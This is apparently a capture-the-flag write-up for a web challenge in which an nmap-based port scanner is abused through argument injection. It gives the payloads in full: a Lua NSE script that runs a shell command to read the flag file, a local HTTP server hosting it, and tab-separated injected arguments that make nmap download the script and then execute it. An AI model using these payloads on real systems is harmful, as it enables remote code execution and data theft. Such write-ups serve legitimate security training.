CSC2023 - [Web] - SSCIT Web Scanner
Challenge Description
It's just an application to scan your ip with port. What can possibly go wrong
Solution
On giving ip and port it scans it using nmap
In nmap there is nmap script engine which we can use to run nmap scripts
Go to this site (opens in a new tab)
Argument Injection
Using nse scripts we can upload our payload to the server and after that run it
First I would create a file which would contain following content
os.execute('cat /flag-*')
I named it payload.nse
Run the http server using following command
python3 -m http.server 8899
Payload 1
service=172.17.0.1:8899%09--script%09http-fetch%09--script-args%09http-fetch.destination=/tmp,http-fetch.url=/payload.nse
Getting requests on http server
Payload 2
service=172.17.0.1:8899%09--script%09/tmp/172.17.0.1/8899/payload.nse
Flag
CSC{Inj3ct10ns_4re_s0_b4d}
Writeups 2023 © RootxRAN.